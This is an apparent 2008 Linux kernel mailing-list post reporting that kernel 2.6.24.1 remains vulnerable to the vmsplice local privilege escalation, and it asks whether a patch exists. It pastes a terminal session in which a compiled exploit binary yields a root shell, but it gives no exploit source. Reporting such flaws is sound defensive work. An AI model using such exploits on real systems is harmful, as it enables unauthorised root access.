Subject: kernel 2.6.24.1 still vulnerable to the vmsplice local root exploit
Newsgroups: gmane.linux.kernel
Date: 2008-02-10 06:04:35 GMT (21 weeks, 3 days, 5 hours and 56 minutes ago)
Hi, As the subject says the 2.6.24.1 is still vulnerable to the vmsplice local root exploit. [opa <at> test tmp]$ uname -a Linux tester 2.6.24.1 #1 Sun Feb 10 00:06:49 EST 2008 i686 unknown [opa <at> test tmp]$ ./vms ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f56000 .. 0xb7f88000 [+] root [root <at> test tmp]# [root <at> test tmp]# id uid=0(root) gid=0(root) groups=2033(opa) [root <at> test tmp]# uname -a Linux test 2.6.24.1 #1 Sun Feb 10 00:06:49 EST 2008 i686 unknown Is there any known fix/patch for this?